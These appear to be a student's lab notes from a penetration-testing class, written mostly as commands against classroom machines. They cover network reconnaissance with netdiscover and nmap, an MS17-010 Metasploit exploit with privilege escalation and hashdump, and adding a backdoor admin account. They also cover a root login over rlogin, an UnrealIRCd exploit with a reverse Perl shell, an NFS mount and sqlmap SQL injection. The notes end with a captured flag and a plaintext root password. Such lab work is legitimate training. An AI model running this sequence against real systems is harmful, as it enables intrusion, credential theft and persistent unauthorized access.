'%3E%3Cg fill='%23000'%3E%3Cpath clip-rule='evenodd' d='m89 11.7c-.8 0-2.2.2-3.2 1.6v-8.10005h-2.8v16.80005h2.7v-1.3c1.1 1.5 2.6 1.5999 3.2 1.5999 3 0 5-2.2999 5-5.2999s-2-5.3-4.9-5.3zm-.7 2.5c1.7 0 2.8 1.2 2.8 2.8s-1.2 2.8-2.8 2.8c-1.7 0-2.8-1.2-2.8-2.8s1.1-2.8 2.8-2.8z' fill-rule='evenodd'/%3E%3Cpath d='m71.2 21.9999v-7.6h1.9v-2.4h-1.9v-3.40005h-2.8v3.40005h-1.1v2.4h1.1v7.6z'/%3E%3Cpath clip-rule='evenodd' d='m65.6999 12h-2.9v1.3c-.8999-1.5-2.4-1.6-3.2-1.6-2.9 0-4.8999 2.4-4.8999 5.3s1.9999 5.2999 5.0999 5.2999c.8 0 2.1001-.0999 3.1001-1.5999v1.3h2.7999zm-5.1999 7.8c-1.7001 0-2.8-1.2-2.8-2.8s1.2-2.8 2.8-2.8c1.7 0 2.7999 1.2 2.7999 2.8s-1.1999 2.8-2.7999 2.8z' fill-rule='evenodd'/%3E%3Cpath d='m79.7001 14.4c-.7-.6-1.3-.7-1.6-.7-.7 0-1.1.3-1.1.8 0 .3.1.6.9.9l.7.2c.1261.0472.2621.0945.4037.1437.7571.2632 1.6751.5823 2.0963 1.2563.3.4.5 1 .5 1.7 0 .9-.3 1.8-1.1 2.5s-1.8 1.0999-3 1.0999c-2.1 0-3.2-.9999-3.9-1.6999l1.5-1.7c.6.6 1.4 1.2 2.2 1.2s1.4-.4 1.4-1.1c0-.6-.5-.9-.9-1l-.6-.2c-.0687-.0295-.1384-.0589-.2087-.0887l-.0011-.0004c-.6458-.2729-1.3496-.5704-1.8902-1.1109-.5-.5-.8-1.1-.8-1.9 0-1 .5-1.8 1-2.3.8-.6 1.8-.7 2.6-.7.7 0 1.9.1 3.2 1.1z'/%3E%3Cpath d='m98.5 20.5-4.8-8.5h3.3l3.1 5.7 2.8-5.7h3.2l-8 15.3h-3.2z'/%3E%3Cpath d='m47 13.7h7c0 .0634.01.1267.0206.1932.0227.1435.0477.3018-.0206.5068 0 4.5-3.4 8.1-8 8.1s-8-3.6-8-8.1c0-4.49995 3.6-8.09995 8-8.09995 2.6 0 5 1.2 6.5 3.3l-2.3 1.49995c-1-1.29995-2.6-2.09995-4.2-2.09995-2.9 0-4.9 2.49995-4.9 5.39995s2.1 5.3 5 5.3c2.6 0 4-1.3 4.6-3.2h-3.7z'/%3E%3C/g%3E%3Cpath d='m18 14h7c0 5.2-3.7 9.6-8.5 10.8l-13.19995-13.2c1.1-4.9 5.5-8.6 10.69995-8.6 3.7 0 6.9 1.8 8.9 4.5l-1.5 1.3c-1.7-2.3-4.4-3.8-7.4-3.8-3.9 0-7.29995 2.5-8.49995 6l11.49995 11.5c2.9-1 5.1-3.5 5.8-6.5h-4.8z' fill='%23fff'/%3E%3Cpath d='m6.2 21.7001c-2.1-2.1-3.2-4.8-3.2-7.6l10.8 10.8c-2.7 0-5.5-1.1-7.6-3.2z' fill='%23fff'/%3E%3Cpath d='m14 0c-7.7 0-14 6.3-14 14s6.3 14 14 14 14-6.3 14-14-6.3-14-14-14zm-7.8 21.8c-2.1-2.1-3.2-4.9-3.2-7.6l10.9 10.8c-2.8-.1-5.6-1.1-7.7-3.2zm10.2 2.9-13.1-13.1c1.1-4.9 5.5-8.6 10.7-8.6 3.7 0 6.9 1.8 8.9 4.5l-1.5 1.3c-1.7-2.3-4.4-3.8-7.4-3.8-3.9 0-7.2 2.5-8.5 6l11.5 11.5c2.9-1 5.1-3.5 5.8-6.5h-4.8v-2h7c0 5.2-3.7 9.6-8.6 10.7z' fill='%237026b9'/%3E%3C/g%3E%3C/svg%3E){kind=small}
#InvestigationMethodology #LinuxClient
We connected to the modem of the prof. We found the pass. 12345678
dhclient -v
ifconfig to see the ip
first thing to do
apt install nast
nast -m : to use IRP protocol and list the machines on the same subnet
netdiscover : all of the subnetworks that could exist on the network
netdiscover -i eth0 -r 192.168.254.0/24 : , to find the the address of the device we'll exploit and to elimine the subnet mask and list more detailed
![[Pasted image 20240409170143.png]]
nmap -sT -vv -F [subnet mask address]/24 - network scanning tool : used for network exploration, host discovery, and security auditing
iptables -A INPUT -j LOG - linux kernel
nmap -sT -v -Pn -O -T5 -A 192.168.254.144/24 - to scan the open ports on the PC we'll exploit. hosts / mac address / ip addresses / security measures of the hosts on a network : like PCs, phones, routers etc.
nmap -sT -vv -F 192.168.255.0/24 we do it with the network address to scan machines
nmap -sT -vv -p- T5 -A 192.168.255.127 we do scan -.127 bc it had weird ports like 10000 so we scan all the ports on it
![[Pasted image 20240410144446.png]]
![[Pasted image 20240410100352.png]]
Metasploit
Finding vulnerabilities on a system and connecting in
msf service : to explore vulnerabilities on the system
msfdb init : to create db
msfconsole : to start the service
when inside the msf6 >
we can do search anything
like search microsoft
or search ms17-010
then we do use 1
then show options
![[Pasted image 20240410103331.png]]
set rhosts 192.168.254.123 (the ip address of the PC we're attacking) : to attack to the Windows PC on the network with this IP address
- could be rhost depending on the module
run to run it
no we have changed the ip address of the host
![[Pasted image 20240410104258.png]]
meterpreter helps us to connect us to the hacked machine on the network.
- actually, the machine is connected to us, it's like SSH. we can use commands on the machine.
- we hacked the windows machine !!
getsystem to have the system rights
getprivs to have the privileged rights
hashdump
![[Pasted image 20240410113415.png]]
shell to connect to the shell / cmd of the PC hacked
![[Pasted image 20240410105037.png]]
we created a user and put the user in the admins group though shell as an excersize.
![[Pasted image 20240410115850.png]]
A. Reconnaissance
ipconfig or ifconfig
we see IP/DNS/Gateway/Network
DNS is provided usually by AD (Active Directory)
2. arp -a : we see 2 commands
1. nast
2. netdiscover
3. nmap - to scan
4. nessus or openvas - to scan vulnerabilities
1. we found ms17-010
B. Exploit/Weaponing
1. metasploit with msfconsole
1. search ms17-010
2. use 0
3. set rhosts [ip]
4. run or exploit
1. meterpreter is the intermediare between the shell and the exploited machine
C. Post exploitation
- meterpreter >
getsystemgetprivshashdump- john theripper
- hashcat
sysinfo- windows
shellnet user [..] /addnet localgroups [..] /add
- linux server shell
the other way to login to windows shell : without metasploit
netdiscover -i eth0 -r 192.168.254.0/24- we do netdiscover to find the ip addresses on the subnet with the ip address of the subnetnmap -sT -v -Pn -O -T5 -A 192.168.254.144/24- we do nmap to the client's ip addresstelnet 192.168.254.144- we don't need to login but we see that there's an opening in telnet as wellrlogin -l root 192.168.254.144- to access to the root of the client
on linux ; exploit of RAM
we do searchsploit (to search in the list of all the exploits on the world) from bash shell or search from metapreter (to search only the exploits in the msfconsole, like files finishing with .rb) to find the vulnerabilities
i go to the bash -i to be able to run the shell in linux terminal after doing the run in msfconsole
linux_x86/local/46249.py - wouldnt work because its local
linux/remote/16850.rb - well search this throuh msfconsole search yaSSL
0.9.8c-1
![[Pasted image 20240410164748.png]]
alienvault ossim
- path of all exploits ; /usr/share/exploitdb/exploits
- to set a payload inside msfconsole in case we face the error of no payload defined :
set payload cmd/unix/reverse_perl - also i might need to set LHOST as well entering my own IP address
should search for : to find something to be able to access to the root@ of the client we're trying to hack backdoor rse kal ![[Pasted image 20240410170919.png]]
- i used openunrealirdc to find an exploit through msfconsole
- use 0
- options
- set rhosts 192.168.254.144 (ip of the exploited pc)
- set lhost 192.168.254.123 (my ip)
- set payload cmd/unix/reverse_perl (https://docs.rapid7.com/metasploit/working-with-payloads/)
- run
then i'm in
i do id to understand which user account i have ;
![[Pasted image 20240410171718.png]]
but bash -i to be able to be in the shell as the user account (root in this case)
![[Pasted image 20240410171810.png]]
RECAP
nmap cible
port protocol version 22/ftp ssh 4.7p1
searchsploit ssh 4.7p1 linux
rb : (metasploit) > msfconsole pl : perl (script.pl) py : python (script.pl) sh : bash (script.sh) c : compiler
gcc -o "executable" -i exploit.c
45233.py
to access through NFS and mnt
with the netdiscover we find the ip of the pc we'll be hacking on the network.
mount -t nfs 192.168.254.153:/ /mnt/
Last exercise
to search with the sqlmap :
sqlmap -u "https://192.168.255.127:10000" ' or 1=1 --' --forms --level=3 --risk=3
i open a port on Kali: ![[Pasted image 20240524162700.png]]
to connect from bash to my Kali machine: ![[Pasted image 20240524162641.png]]
in the user.txt file 3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
mp de root : Ts&4&YurgtRX(=~h